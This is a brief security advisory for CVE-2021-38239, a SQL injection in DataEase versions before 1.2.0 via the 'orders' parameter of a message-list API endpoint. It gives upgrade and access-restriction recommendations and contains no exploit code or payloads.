Dataease · Dataease · CVE-2021-38239
**Name of the Vulnerable Software and Affected Versions**
dataease versions prior to 1.2.0
**Description**
The issue allows attackers to gain sensitive information via the `orders` parameter to the "/api/sys msg/list/1/10" API endpoint. This is a SQL Injection vulnerability.
**Recommendations**
For versions prior to 1.2.0, update to version 1.2.0 or later to resolve the issue.
As a temporary workaround, consider restricting access to the "/api/sys msg/list/1/10" API endpoint to minimize the risk of exploitation.
Avoid using the `orders` parameter in the affected API endpoint until the issue is resolved.